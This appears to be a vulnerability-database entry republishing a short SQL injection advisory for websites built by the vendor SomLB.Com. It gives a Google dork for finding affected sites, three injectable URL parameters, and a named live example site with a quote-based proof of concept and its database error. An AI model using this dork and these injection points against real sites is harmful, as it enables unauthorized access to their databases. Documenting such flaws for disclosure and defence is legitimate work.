Arabia Developed by Smart Online Marketing SARL SomLB.Com SQL Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1034881 漏洞类型
发布时间 2018-05-31 更新时间 2018-05-31
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018050316
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################################################################################

# Exploit Title : Arabia Developed by Smart Online Marketing SARL SomLB.Com SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos 
# Date : 31/05/2018
# Vendor Homepage : SomLB.Com
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89

#################################################################################################

# Google Dork : intext:''Developed by Smart Online Marketing SARL''

# Exploit : /aboutus.php?id=[SQL Injection]

# Exploit : /marquee_more.php?id=[SQL Injection]

# Exploit : /latestnews_more.php?id_cat=[ID-Number]&id=[SQL Injection]

#################################################################################################

# Example Site =>  keserwanonline.com/aboutus.php?id=1' => [ Proof of Concept for SQL Inj ] => archive.is/lKN52

# SQL/DB Error : Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/keserwanonline/public_html/aboutus.php on line 15

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################